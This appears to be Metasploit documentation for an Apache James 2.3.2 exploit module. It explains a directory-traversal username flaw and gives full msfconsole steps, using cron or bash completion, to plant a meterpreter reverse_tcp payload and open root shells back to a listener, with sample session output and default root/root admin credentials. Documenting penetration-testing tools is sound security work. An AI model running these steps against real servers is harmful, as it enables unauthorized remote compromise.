adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a05611d756ed8dba62b50a7c602415ca1ea01fa8
metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md
T
mattaberegg a05611d756 Improve cleanup functionality
2020-02-07 16:13:25 -08:00

4.9 KiB
Raw Blame History

Vulnerable Application

This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:
https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

Verification Steps

If using Cron exploitation method: This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects.

1. Load the module:

  msf5 > use exploit/linux/smtp/apache_james_exec

2. Set remote and local options:

  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
  target => 1  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169  
  rhosts =>  192.168.224.169  

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444

3. Set payload:

  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp

4. Check version and run exploit:

  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
  
  [*] Started reverse TCP handler on 192.168.224.167:4444
  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
  [*] Sending stage (3021284 bytes) to 192.168.224.169
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)

  meterpreter >

If using Bash Completion: This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.

1. Load the module:

  msf5 > use exploit/linux/smtp/apache_james_exec

2. Set remote and local options:

  msf5 exploit(linux/smtp/apache_james_exec) > set target 0  
  target => 0  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
  rhosts => 192.168.224.164

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444

3. Set payload:

  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp

4. Check version and run exploit:

  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)

5. Set up and run listener (Can be done before running exploit):

  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >

Options

USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
RHOSTS: The IP address of the vulnerable server.
RPORT: The port number of the SMTP service.
POP3PORT The port for the POP3 Apache James Service. By default this '110'.

Targets

  Id  Name 
  --  ----
  0   Bash Completion  
  1   Cron

References

  1. https://www.exploit-db.com/exploits/35513
  2. https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
Reference in New Issue View Git Blame Copy Permalink